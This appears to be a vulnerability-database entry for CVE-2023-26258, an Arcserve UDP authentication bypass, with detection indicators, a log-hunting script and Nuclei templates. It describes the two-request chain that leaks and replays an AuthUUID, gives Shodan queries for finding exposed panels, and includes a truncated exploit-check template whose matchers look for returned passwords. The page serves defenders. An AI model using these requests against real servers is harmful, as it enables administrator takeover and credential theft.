CVE-2023-26258
Published 2023-07-03
Priority: P189 · critical · 9.8 (CVSS 3.1)
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 38.36% (98.4th percentile)
Arcserve UDP through 9.0.6034 allows authentication bypass. The method getVersionInfo at WebServiceImpl/services/FlashServiceImpl leaks the AuthUUID token. This token can be used at /WebServiceImpl/services/VirtualStandbyServiceImpl to obtain a valid session. This session can be used to execute any task as administrator.
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| arcserve | udp | <= 9.0.6034 | — |
Detection & IOCs (extracted from sources)
- other: ns5:authUUID
- other: ([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})
- other: http.favicon.hash:-1889244460
- other: icon_hash="-1889244460"
- Detect exploitation attempt: HTTP POST to /WebServiceImpl/services/FlashServiceImpl with SOAPAction header to invoke getVersionInfo and leak the AuthUUID token.
- Detect second-stage exploitation: HTTP POST to /WebServiceImpl/services/VirtualStandbyServiceImpl using the extracted AuthUUID to obtain a valid privileged session.
- Successful AuthUUID leak is confirmed when the response body contains 'ns5:authUUID', HTTP 200, and Content-Type text/xml.
- Successful session hijack is confirmed when the response body contains 'ns5:uuid', 'ns5:userName', and 'ns5:password' fields.
- Identify Arcserve UDP web panels exposed on the internet using Shodan favicon hash -1889244460 or FOFA icon_hash query.
- Arcserve UDP panel fingerprint: response body contains 'Arcserve UDP' or '/arcserve.js' with HTTP 200.
- The authentication bypass affects Arcserve UDP through version 9.0.6034; the vulnerability allows any unauthenticated user to escalate to administrator by chaining two SOAP endpoints.
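
The two-stage pattern in the list above can be hunted in web access logs. The following is an added example, not part of the original page or of any vendor tooling: it flags a source address that gets HTTP 200 on a POST to FlashServiceImpl and then on a POST to VirtualStandbyServiceImpl shortly afterwards. The combined log format, the 10-minute window and the sample lines are assumptions; access logs carry no response body, so a hit is a lead to confirm against the response indicators listed above.

```python
import re
from datetime import datetime, timedelta

LEAK_PATH = "/WebServiceImpl/services/FlashServiceImpl"
SESSION_PATH = "/WebServiceImpl/services/VirtualStandbyServiceImpl"
WINDOW = timedelta(minutes=10)  # assumed correlation window, tune per site

# Assumed combined-log-format line: ip - - [ts] "METHOD path proto" status size
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed sample input (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [03/Jul/2023:10:00:01 +0000] "GET / HTTP/1.1" 200 5120
198.51.100.7 - - [03/Jul/2023:10:00:02 +0000] "POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1" 200 912
198.51.100.7 - - [03/Jul/2023:10:00:03 +0000] "POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1" 200 1433
203.0.113.20 - - [03/Jul/2023:10:05:00 +0000] "POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1" 200 912
203.0.113.9 - - [03/Jul/2023:11:00:00 +0000] "POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1" 500 210
192.0.2.44 - - [03/Jul/2023:09:00:00 +0000] "POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1" 200 912
192.0.2.44 - - [03/Jul/2023:12:30:00 +0000] "POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1" 200 1433
"""

def find_chains(log_text, window=WINDOW):
    """Return (ip, leak_time, session_time) for each successful FlashServiceImpl
    POST followed within `window` by a successful VirtualStandbyServiceImpl POST
    from the same source address."""
    last_leak = {}  # ip -> time of most recent 200 on the leak endpoint
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST" or m["status"] != "200":
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        path = m["path"].split("?", 1)[0]  # ignore any query string
        if path == LEAK_PATH:
            last_leak[m["ip"]] = ts
        elif path == SESSION_PATH:
            leak_ts = last_leak.get(m["ip"])
            if leak_ts is not None and timedelta(0) <= ts - leak_ts <= window:
                alerts.append((m["ip"], leak_ts, ts))
    return alerts

if __name__ == "__main__":
    for ip, leak_ts, sess_ts in find_chains(SAMPLE_LOG):
        print(f"ALERT {ip}: leak request {leak_ts}, session request {sess_ts}")
```
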
CVSS provenance
nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck · 9.8 CRITICAL
GHSA
GHSA-wvxg-vj6j-j677: Arcserve UDP through 9
ghsa_unreviewed·2023-07-03
CVE-2023-26258 [CRITICAL] CWE-863 GHSA-wvxg-vj6j-j677: Arcserve UDP through 9
VulnCheck
arcserve udp Incorrect Authorization
vulncheck·2023·CVSS 9.8
CVE-2023-26258 [CRITICAL] arcserve udp Incorrect Authorization
Affected: arcserve udp
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-08-19&host_type=src&vulnerability=cve-2023-26258; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-09-24&host_type=
No detection rules found.
Nuclei
ArcServe Panel - Detect
nuclei·CVSS 9.8
CVE-2023-26258 [CRITICAL] ArcServe Panel - Detect
ArcServe Panel - Detect
Template:

```yaml
id: arcserve-panel

info:
  name: ArcServe Panel - Detect
  author: DhiyaneshDk
  severity: info
  reference:
    - https://twitter.com/HunterMapping/status/1674267368359444480
    - https://github.com/mdsecactivebreach/CVE-2023-26258-ArcServe
  classification:
    cpe: cpe:2.3:a:arcserve:udp:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: arcserve
    product: udp
    shodan-query:
      - http.favicon.hash:-1889244460
      - http.favicon.hash:"-1889244460"
    fofa-query: icon_hash="-1889244460"
  tags: panel,login,arcserve,detect,discovery

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Arcserve UDP"
          - "/arcserve.js"
        condition: or

      - type: status
        status:
          - 200
# digest: 4a0a00473045022056ddb8d15fa05fb49a7ad6010cdb57010
```
Nuclei
Arcserve UDP <= 9.0.6034 - Authentication Bypass
nuclei·CVSS 9.8
CVE-2023-26258 [CRITICAL] Arcserve UDP <= 9.0.6034 - Authentication Bypass
Arcserve UDP
```yaml
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains(body, "ns5:authUUID")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: auth_uuid
        group: 1
        part: body
        internal: true
        regex:
          - '([0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12})'

  - raw:
      - |
        POST /WebServiceImpl/services/VirtualStandbyServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml
        {{auth_uuid}}
      - |
        POST /WebServiceImpl/services/FlashServiceImpl HTTP/1.1
        Host: {{Hostname}}
        SOAPAction: ""
        Content-Type: text/xml

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/xml")'
          - 'contains_all(body, "ns5:uuid", "ns5:userName", "ns5:password")'
        condition: and

    extractors:
      - type:
```
No writeups or analysis indexed.
https://support.arcserve.com/s/article/KB000015720?language=en_US
https://www.arcserve.com/products/arcserve-udp
https://www.mdsec.co.uk/2023/06/cve-2023-26258-remote-code-execution-in-arcserve-udp-backup/
Published: 2023-07-03
Exploited in the wild